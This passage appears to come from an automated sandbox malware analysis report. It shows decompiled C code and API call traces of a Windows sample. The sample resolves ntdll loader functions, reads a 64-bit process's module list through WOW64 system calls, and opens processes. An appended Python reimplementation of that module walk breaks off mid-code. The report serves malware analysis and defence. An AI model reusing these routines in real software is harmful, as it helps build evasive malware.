    				_t9 = _t19 - 0x10; // -16
    				_t14 = _t9;
    				 *[fs:0x0] = _t14;
    				return _t14;
    			}







    0x00402d2c
    0x00402d37
    0x00402d3c
    0x00402d40
    0x00402d4c
    0x00402d4f
    0x00402d53
    0x00402d5a
    0x00402d5d
    0x00402d5d
    0x00402d60
    0x00402d66

    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
    • memset.NTDLL ref: 012A3C99
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012A3CCB
    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 012A3CDF
    • CloseHandle.KERNEL32(?), ref: 012A3CF6
    • lstrcat.KERNEL32(00000000,012AC67D), ref: 012A3D3C
    • FindNextFileA.KERNEL32(?,?), ref: 012A3D84
    • StrChrA.SHLWAPI(?,0000002E), ref: 012A3DF2
    • memcpy.NTDLL(?,?,00000000), ref: 012A3E2B
    • FindNextFileA.KERNEL32(?,?), ref: 012A3E40
    • CompareFileTime.KERNEL32(?,?), ref: 012A3E69
    • HeapFree.KERNEL32(00000000,?), ref: 012A3EB0
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A3EC0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 100%
    			E0040231B(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				intOrPtr _v0;
    				long _v4;
    				char _v8;
    				signed int _v12;
    				long _v20;
    				long _v24;
    				void* _t37;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    				char* _t42;
    				CHAR* _t48;
    				long _t52;
    				void* _t53;
    				void* _t55;
    
    				_v12 = 2;
    				E00401D9F(_a4, 0, 0,  &_v8);
    				_t52 = _v24;
    				_v20 = _t52;
    				_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
    				if(_t55 == 0) {
    					L15:
    					_v12 = 8;
    					L16:
    					if(_t55 != 0) {
    						VirtualFree(_t55, 0, 0x8000);
    					}
    					return _v12;
    				} else {
    					goto L1;
    				}
    				while(1) {
    					L1:
    					_t37 = E00401D9F(_a4, _t55, _t52,  &_v8);
    					_t52 = _v24;
    					if(_t37 != 0 || _v4 >= _t52) {
    						break;
    					}
    					_v4 = _t52;
    					VirtualFree(_t55, 0, 0x8000);
    					_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
    					if(_t55 != 0) {
    						continue;
    					}
    					break;
    				}
    				if(_t55 == 0 || _v4 < _t52) {
    					goto L15;
    				} else {
    					_a4 = _a4 & 0x00000000;
    					_t14 = _t55 + 8; // 0x8
    					_t53 = _t14;
    					if( *_t55 <= 0) {
    						goto L16;
    					}
    					while(1) {
    						_t48 = ( *(_t53 + 0x1e) & 0x0000ffff) + _t53 + 0x20;
    						if(lstrcmpiA(_t48, ?str?) == 0) {
    							break;
    						}
    						_t42 = StrChrA(_t48, 0x2e);
    						if(_t42 == 0) {
    							L11:
    							_t53 = _t53 + 0x120;
    							_v0 = _v0 + 1;
    							if(_v0 <  *_t55) {
    								continue;
    							}
    							goto L16;
    						}
    						 *_t42 = 0;
    						if(lstrcmpiA(_t48, ?str?) == 0) {
    							break;
    						}
    						goto L11;
    					}
    					_t40 = _a8;
    					_v12 = _v12 & 0x00000000;
    					 *_t40 =  *((intOrPtr*)(_t53 + 8));
    					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t53 + 0xc));
    					_t41 = _a12;
    					if(_t41 != 0) {
    						 *_t41 =  *((intOrPtr*)(_t53 + 0x10));
    					}
    					goto L16;
    				}
    			}

















    0x0040232f
    0x00402337
    0x0040233c
    0x00402350
    0x00402356
    0x0040235a
    0x00402426
    0x00402426
    0x0040242e
    0x00402430
    0x0040243a
    0x0040243a
    0x0040244b
    0x00000000
    0x00000000
    0x00000000
    0x00402360
    0x00402360
    0x0040236b
    0x00402372
    0x00402376
    0x00000000
    0x00000000
    0x00402386
    0x0040238a
    0x00402398
    0x0040239c
    0x00000000
    0x00000000
    0x00000000
    0x0040239c
    0x004023a0
    0x00000000
    0x004023ac
    0x004023ac
    0x004023b4
    0x004023b4
    0x004023b7
    0x00000000
    0x00000000
    0x004023bf
    0x004023c3
    0x004023d1
    0x00000000
    0x00000000
    0x004023d6
    0x004023de
    0x004023ef
    0x004023ef
    0x004023f5
    0x004023ff
    0x00000000
    0x00000000
    0x00000000
    0x00402401
    0x004023e6
    0x004023ed
    0x00000000
    0x00000000
    0x00000000
    0x004023ed
    0x00402406
    0x0040240a
    0x0040240f
    0x00402414
    0x00402417
    0x0040241d
    0x00402422
    0x00402422
    0x00000000
    0x0040241d

    APIs
      • Part of subcall function 00401D9F: GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401DBD
      • Part of subcall function 00401D9F: StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 00401F43
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402354
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 0040238A
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402396
    • lstrcmpiA.KERNEL32(?,NTDLL.DLL,?,00000000,00000000,00000000), ref: 004023CD
    • StrChrA.SHLWAPI(?,0000002E), ref: 004023D6
    • lstrcmpiA.KERNEL32(?,NTDLL.DLL), ref: 004023E9
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040243A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
    • lstrlen.KERNEL32(@CODE@,00000000,?,00001000,012AA03C), ref: 012A145E
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A148E
    • memcpy.NTDLL(00000000,00001000,00000000), ref: 012A14A0
    • memcpy.NTDLL(0000000B,00001000,00000000,00000000,00001000,00000000), ref: 012A14B1
    • memcpy.NTDLL(00000000,00000000,?,0000000B,00001000,00000000,00000000,00001000,00000000), ref: 012A14CB
    • HeapFree.KERNEL32(00000000,00001000), ref: 012A14DC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • StrChrA.SHLWAPI(?,0000005F), ref: 012A177F
    • memcpy.NTDLL(?,?,?), ref: 012A1796
    • lstrcpy.KERNEL32(?), ref: 012A17AD
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
      • Part of subcall function 012A25A8: SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
      • Part of subcall function 012A25A8: memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
      • Part of subcall function 012A25A8: SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
      • Part of subcall function 012A16D5: lstrlen.KERNEL32(012AB2BC,80000003,?,012A1874,?,?,80000003,?,?,012AC797,80000003,00000000), ref: 012A16DE
      • Part of subcall function 012A16D5: lstrlenW.KERNEL32(?), ref: 012A16EA
      • Part of subcall function 012A16D5: RtlAllocateHeap.NTDLL(00000000,000000E6), ref: 012A1702
      • Part of subcall function 012A16D5: memcpy.NTDLL(00000000,012AC7BC,0000000E), ref: 012A1716
    • lstrcpy.KERNEL32(?,012AC6BE), ref: 012A1881
      • Part of subcall function 012A2544: SysAllocString.OLEAUT32(?), ref: 012A255E
      • Part of subcall function 012A2544: SysFreeString.OLEAUT32(00000000), ref: 012A2595
      • Part of subcall function 012A2466: memcpy.NTDLL(00000000,?,?,?,?,80000003,?,012AC290,?,012AC0DC,?,80000003,?,00000000), ref: 012A24CC
      • Part of subcall function 012A2466: SafeArrayDestroy.OLEAUT32(?), ref: 012A24E6
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • lstrcpyn.KERNEL32(?,004040BC,00000008), ref: 012AE339
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 012AE3AC
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000001), ref: 012AE40E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    APIs
      • Part of subcall function 012A3ED0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A3F1F
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • wsprintfA.USER32 ref: 012A13CC
    • lstrlen.KERNEL32(Software\AppDataLow\Software\Microsoft\), ref: 012A13DB
    • lstrcpy.KERNEL32(00000000,Software\AppDataLow\Software\Microsoft\), ref: 012A13F5
    • lstrcat.KERNEL32(00000000,00000000), ref: 012A13FD
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,012A1061,?), ref: 012A388F
    • GetVersion.KERNEL32 ref: 012A389E
    • GetCurrentProcessId.KERNEL32 ref: 012A38B5
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012A38D2
    • GetLastError.KERNEL32 ref: 012A38F1
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012AE4DE
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 012AE4F0
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 012AE508
    • CloseHandle.KERNEL32(?), ref: 012AE523
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    APIs
    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,012A49A4,00000000,?,?,012A4B6B,?,012AB2A4), ref: 012A47E2
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A47FA
    • memcpy.NTDLL(00000000,012AB2A4,-00000008,?,?,?,012A49A4,00000000,?,?,012A4B6B,?,012AB2A4), ref: 012A483E
    • memcpy.NTDLL(00000001,012AB2A4,00000001,012A4B6B,?,012AB2A4), ref: 012A485F
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 80%
    			E004012AC(signed int __edx, intOrPtr _a8) {
    				intOrPtr _v0;
    				intOrPtr _v8;
    				void* _v20;
    				void* __esi;
    				signed int _t5;
    				signed int _t7;
    				signed int _t10;
    				signed int _t12;
    				signed int _t15;
    				signed int _t17;
    				void* _t19;
    				void* _t20;
    				signed int _t21;
    				void* _t22;
    				void* _t23;
    
    				_t21 = __edx;
    				_t5 =  *0x40545c; // 0x0
    				_t23 = 0;
    				if((_t5 |  *0x405460) == 0) {
    					L3:
    					_t23 = 0x7f;
    					_push("LdrLoadDll");
    					_push(_a8);
    					_t7 = E0040244E(_t19, _t20, _t22, _t23, _t28);
    					 *0x40545c = _t7;
    					_t29 = _t7 | _t21;
    					 *0x405460 = _t21;
    					if((_t7 | _t21) != 0) {
    						_push("LdrGetProcedureAddress");
    						_push(_v0);
    						_t10 = E0040244E(_t19, _t20, _t22, _t23, _t29);
    						 *0x405464 = _t10;
    						_t30 = _t10 | _t21;
    						 *0x405468 = _t21;
    						if((_t10 | _t21) != 0) {
    							_push("ZwProtectVirtualMemory");
    							_push(_v8);
    							_t12 = E0040244E(_t19, _t20, _t22, _t23, _t30);
    							 *0x40546c = _t12;
    							 *0x405470 = _t21;
    							if((_t12 | _t21) != 0) {
    								_t23 = 0;
    								goto L7;
    							}
    						}
    					}
    				} else {
    					_t15 =  *0x405464; // 0x0
    					if((_t15 |  *0x405468) == 0) {
    						goto L3;
    					} else {
    						_t17 =  *0x40546c; // 0x0
    						_t28 = _t17 |  *0x405470;
    						if((_t17 |  *0x405470) != 0) {
    							L7:
    							memcpy(_v20, 0x40545c, 0x18);
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _t23;
    			}


















    0x004012ac
    0x004012ac
    0x004012b2
    0x004012ba
    0x004012d6
    0x004012d8
    0x004012d9
    0x004012de
    0x004012e2
    0x004012e7
    0x004012ec
    0x004012ee
    0x004012f4
    0x004012f6
    0x004012fb
    0x004012ff
    0x00401304
    0x00401309
    0x0040130b
    0x00401311
    0x00401313
    0x00401318
    0x0040131c
    0x00401321
    0x00401328
    0x0040132e
    0x00401330
    0x00000000
    0x00401330
    0x0040132e
    0x00401311
    0x004012bc
    0x004012bc
    0x004012c7
    0x00000000
    0x004012c9
    0x004012c9
    0x004012ce
    0x004012d4
    0x00401332
    0x0040133d
    0x00000000
    0x00000000
    0x00000000
    0x004012d4
    0x004012c7
    0x00401348

    APIs
      • Part of subcall function 0040244E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,00404118,00000030,00401FD9,ZwGetContextThread,?,0040206F,?,00000318,00000008), ref: 0040248A
      • Part of subcall function 0040244E: VirtualFree.KERNEL32(?,00000000,00008000,00000010,?,?,00404118,00000030,00401FD9,ZwGetContextThread,?,0040206F,?,00000318,00000008), ref: 00402513
    • memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,0040151D,?,?,?,?,00000000), ref: 0040133D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
    • lstrlen.KERNEL32(012AB2BC,80000003,?,012A1874,?,?,80000003,?,?,012AC797,80000003,00000000), ref: 012A16DE
    • lstrlenW.KERNEL32(?), ref: 012A16EA
    • RtlAllocateHeap.NTDLL(00000000,000000E6), ref: 012A1702
    • memcpy.NTDLL(00000000,012AC7BC,0000000E), ref: 012A1716
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012AE2A6
    • GetVersion.KERNEL32 ref: 012AE2B5
    • GetCurrentProcessId.KERNEL32 ref: 012AE2CC
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012AE2E5
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4599
    • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,012A1F20,00000058,00000000,00000000), ref: 012A45A3
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A45CB
      • Part of subcall function 012A4420: StrTrimA.SHLWAPI(?,012AA274), ref: 012A4459
      • Part of subcall function 012A4420: StrTrimA.SHLWAPI(00000001,012AA274), ref: 012A4476
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A45E7
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • SetEvent.KERNEL32(012AB200), ref: 012A10E0
    • SleepEx.KERNEL32(00000064,00000001), ref: 012A10EF
    • CloseHandle.KERNEL32(012AB200), ref: 012A1110
    • HeapDestroy.KERNEL32(012AB1D0), ref: 012A1120
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A46B7
    • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,012A1F20,00000058,00000000,00000000), ref: 012A46C1
    • HeapFree.KERNEL32(00000000), ref: 012A46EF
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4704
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 81%
    			E00401D9F(intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr* _a16) {
    				char _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				unsigned int _v28;
    				intOrPtr _v32;
    				char _v36;
    				signed int _v40;
    				intOrPtr _v44;
    				char _v84;
    				char _v92;
    				void* __esi;
    				_Unknown_base(*)()* _t80;
    				intOrPtr* _t81;
    				intOrPtr _t84;
    				intOrPtr _t88;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				intOrPtr _t94;
    				signed int* _t95;
    				unsigned int _t102;
    				intOrPtr _t104;
    				signed int _t105;
    				char* _t107;
    				signed int _t109;
    				signed int* _t111;
    				char _t124;
    				void* _t125;
    				intOrPtr* _t127;
    				intOrPtr _t128;
    				unsigned int _t131;
    
    				_v24 = _v24 & 0x00000000;
    				_v12 = _v12 & 0x00000000;
    				_t109 = 0;
    				_t80 = GetProcAddress( *0x4054c4, "ZwWow64QueryInformationProcess64");
    				if(_t80 == 0) {
    					L23:
    					_t81 = _a16;
    					if(_t81 != 0) {
    						 *_t81 = _t109;
    					}
    					if(_t109 <= _a12 && _t109 != 0) {
    						_v24 = 1;
    					}
    					return _v24;
    				}
    				_push( &_v8);
    				_push(0x30);
    				_push( &_v92);
    				_push(0);
    				_push(_a4);
    				if( *_t80() < 0) {
    					goto L23;
    				}
    				_t84 = E00401046(0x200);
    				_v20 = _t84;
    				if(_t84 == 0) {
    					goto L23;
    				}
    				_t125 = E00401046(0x100);
    				if(_t125 == 0) {
    					L21:
    					E0040105B(_v20);
    					if(_t125 != 0) {
    						E0040105B(_t125);
    					}
    					goto L23;
    				}
    				_t88 = E00401D4B( &_v92,  &_v84, _a4, _t125, 0x28);
    				_v8 = _t88;
    				if(_t88 == 0) {
    					goto L21;
    				}
    				_t12 = _t125 + 0x28; // 0x28
    				_t14 = _t125 + 0x18; // 0x18
    				_t127 = _t14;
    				_t90 = E00401D4B( &_v92, _t127, _a4, _t12, 0x40);
    				_v8 = _t90;
    				if(_t90 == 0) {
    					goto L21;
    				}
    				_t114 =  *(_t127 + 4);
    				_t124 =  *((intOrPtr*)(_t125 + 0x38));
    				_t128 =  *((intOrPtr*)(_t125 + 0x3c));
    				_t92 =  *_t127 + 0x10;
    				asm("adc ecx, ebx");
    				_t111 =  &(_a8[2]);
    				_v44 = _t92;
    				_v40 = _t114;
    				_v36 = _t124;
    				_v32 = _t128;
    				_v16 = 4;
    				if(_t124 != _t92 || _t128 != _t114) {
    					while(1) {
    						_t25 = _t125 + 0x68; // 0x68
    						_t94 = E00401D4B(_t114,  &_v36, _a4, _t25, 0x98);
    						_v8 = _t94;
    						if(_t94 == 0) {
    							goto L18;
    						}
    						_v16 = _v16 + 0x120;
    						_v36 =  *((intOrPtr*)(_t125 + 0x68));
    						_v32 =  *((intOrPtr*)(_t125 + 0x6c));
    						if(_v16 > _a12) {
    							L16:
    							if(_v36 != _v44 || _v32 != _v40) {
    								continue;
    							} else {
    								goto L18;
    							}
    						}
    						_t111[6] = _v12;
    						_t111[5] =  *(_t125 + 0xd0);
    						_t111[7] =  *((intOrPtr*)(_t125 + 0xd4));
    						_t111[4] =  *(_t125 + 0xa8);
    						_t102 = ( *(_t125 + 0xb0) & 0x0000ffff) >> 1;
    						_t111[2] =  *(_t125 + 0x98);
    						_t114 =  *(_t125 + 0x9c);
    						_v28 = _t102;
    						_t111[3] =  *(_t125 + 0x9c);
    						if(_t102 >= 0x100) {
    							L15:
    							_t111 =  &(_t111[0x48]);
    							_v12 = _v12 + 1;
    							goto L16;
    						}
    						_t53 = _t125 + 0xb8; // 0xb8
    						_t104 = E00401D4B(_t114, _t53, _a4, _v20,  *(_t125 + 0xb0) & 0x0000ffff);
    						_v8 = _t104;
    						if(_t104 == 0) {
    							goto L15;
    						}
    						_t131 = _v28;
    						_t105 = 0;
    						if(_t131 <= 0) {
    							L14:
    							_t62 =  &(_t111[8]); // 0x18
    							( &(_t111[8]))[_t131] = 0;
    							_t107 = StrRChrA(_t62, 0, 0x5c);
    							_t114 = 0xffe1 - _t111;
    							_t111[7] =  &(_t107[0xffe1]);
    							goto L15;
    						} else {
    							goto L13;
    						}
    						do {
    							L13:
    							 *((char*)(_t111 + _t105 + 0x20)) =  *((intOrPtr*)(_v20 + _t105 * 2));
    							_t105 = _t105 + 1;
    						} while (_t105 < _t131);
    						goto L14;
    					}
    					goto L18;
    				} else {
    					L18:
    					_t95 = _a8;
    					if(_t95 != 0) {
    						 *_t95 = _v12;
    					}
    					_t109 = _v16;
    					goto L21;
    				}
    			}



































    0x00401da5
    0x00401da9
    0x00401dbb
    0x00401dbd
    0x00401dc5
    0x00401f98
    0x00401f98
    0x00401f9d
    0x00401f9f
    0x00401f9f
    0x00401fa4
    0x00401faa
    0x00401faa
    0x00401fb8
    0x00401fb8
    0x00401dce
    0x00401dcf
    0x00401dd4
    0x00401dd5
    0x00401dd6
    0x00401ddd
    0x00000000
    0x00000000
    0x00401de8
    0x00401def
    0x00401df2
    0x00000000
    0x00000000
    0x00401e02
    0x00401e06
    0x00401f86
    0x00401f89
    0x00401f90
    0x00401f93
    0x00401f93
    0x00000000
    0x00401f90
    0x00401e15
    0x00401e1c
    0x00401e1f
    0x00000000
    0x00000000
    0x00401e27
    0x00401e2e
    0x00401e2e
    0x00401e31
    0x00401e38
    0x00401e3b
    0x00000000
    0x00000000
    0x00401e43
    0x00401e46
    0x00401e49
    0x00401e4c
    0x00401e4f
    0x00401e54
    0x00401e59
    0x00401e5c
    0x00401e5f
    0x00401e62
    0x00401e65
    0x00401e6c
    0x00401e76
    0x00401e7b
    0x00401e85
    0x00401e8c
    0x00401e8f
    0x00000000
    0x00000000
    0x00401e98
    0x00401e9f
    0x00401ea5
    0x00401eae
    0x00401f5f
    0x00401f65
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401f65
    0x00401ebf
    0x00401ec9
    0x00401ed3
    0x00401edd
    0x00401ee6
    0x00401eed
    0x00401ef0
    0x00401ef6
    0x00401ef9
    0x00401efc
    0x00401f56
    0x00401f56
    0x00401f5c
    0x00000000
    0x00401f5c
    0x00401f09
    0x00401f12
    0x00401f19
    0x00401f1c
    0x00000000
    0x00000000
    0x00401f1e
    0x00401f21
    0x00401f25
    0x00401f36
    0x00401f3a
    0x00401f3e
    0x00401f43
    0x00401f4e
    0x00401f52
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401f27
    0x00401f27
    0x00401f2d
    0x00401f31
    0x00401f32
    0x00000000
    0x00401f27
    0x00000000
    0x00401f77
    0x00401f77
    0x00401f77
    0x00401f7c
    0x00401f81
    0x00401f81
    0x00401f83
    0x00000000
    0x00401f83

    APIs
    • GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401DBD
      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    • StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 00401F43
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 00401D4B: GetProcAddress.KERNEL32(ZwWow64ReadVirtualMemory64,00000000,?,?,?,00401E1A,00000000,00000000,00000028,00000100,00000200), ref: 00401D6D
    Strings
    • ZwWow64QueryInformationProcess64, xrefs: 00401DB0
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
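The two decompiled routines E00401D9F (above) and E0040231B (earlier on this page) together implement one technique: from the 32-bit sample, read another process's 64-bit PEB through ZwWow64QueryInformationProcess64 / ZwWow64ReadVirtualMemory64, walk PEB64.Ldr -> InLoadOrderModuleList copying 0x98 bytes per LDR_DATA_TABLE_ENTRY64, and return DllBase and SizeOfImage of the entry whose base name matches NTDLL.DLL. The example below is added here and is not code from the report or from the analysed sample. It reproduces that walk in Python with the read primitive injected as a callable, so it runs offline against a constructed 64-bit address space; the PEB/LDR offsets are the public structure layouts (the same constants the decompile uses), while the module paths, base addresses, sizes, and all function and constant names are assumptions made for the example. The sample's 0x120-byte output records and its required-size/VirtualAlloc retry loop are not reproduced.

```python
import struct
from typing import Callable, List, NamedTuple, Optional, Tuple

ReadMem = Callable[[int, int], bytes]   # read(addr64, size) -> bytes, raises on failure

# Public PEB64 / PEB_LDR_DATA64 / LDR_DATA_TABLE_ENTRY64 offsets (the decompile
# uses the same constants: +0x18, +0x10, 0x98, +0x30, +0x40, +0x48/+0x50, 0x100).
PBI64_PEB_BASE = 0x08            # PROCESS_BASIC_INFORMATION64.PebBaseAddress
PEB64_LDR = 0x18                 # PEB64.Ldr
LDR64_IN_LOAD_ORDER_LIST = 0x10  # PEB_LDR_DATA64.InLoadOrderModuleList
ENTRY64_SIZE = 0x98              # bytes of LDR_DATA_TABLE_ENTRY64 the sample copies
ENTRY64_DLL_BASE = 0x30
ENTRY64_SIZE_OF_IMAGE = 0x40
ENTRY64_FULL_NAME_LEN = 0x48     # UNICODE_STRING64.Length, in bytes
ENTRY64_FULL_NAME_BUF = 0x50     # UNICODE_STRING64.Buffer
MAX_NAME_CHARS = 0x100           # the sample leaves names of 0x100+ WCHARs empty
MAX_ENTRIES = 4096               # guard the sample lacks: it only bounds its output buffer

class Module64(NamedTuple):
    dll_base: int
    size_of_image: int
    full_name: str

    @property
    def base_name(self) -> str:          # StrRChrA(path, '\\') + 1 in E00401D9F
        return self.full_name.rsplit("\\", 1)[-1]

def _u64(buf: bytes, off: int) -> int:
    return struct.unpack_from("<Q", buf, off)[0]

def walk_ldr64(read: ReadMem, pbi: bytes) -> List[Module64]:
    """Modules in load order; a failed read ends the walk and, as in the
    sample, whatever was collected so far is returned."""
    modules: List[Module64] = []
    try:
        peb = _u64(pbi, PBI64_PEB_BASE)
        ldr = _u64(read(peb + PEB64_LDR, 8), 0)
        head = ldr + LDR64_IN_LOAD_ORDER_LIST
        flink = _u64(read(head, 8), 0)
        while flink != head and len(modules) < MAX_ENTRIES:
            entry = read(flink, ENTRY64_SIZE)
            name_len = struct.unpack_from("<H", entry, ENTRY64_FULL_NAME_LEN)[0]
            name = ""
            if name_len // 2 < MAX_NAME_CHARS:
                name = read(_u64(entry, ENTRY64_FULL_NAME_BUF), name_len).decode("utf-16-le")
            modules.append(Module64(
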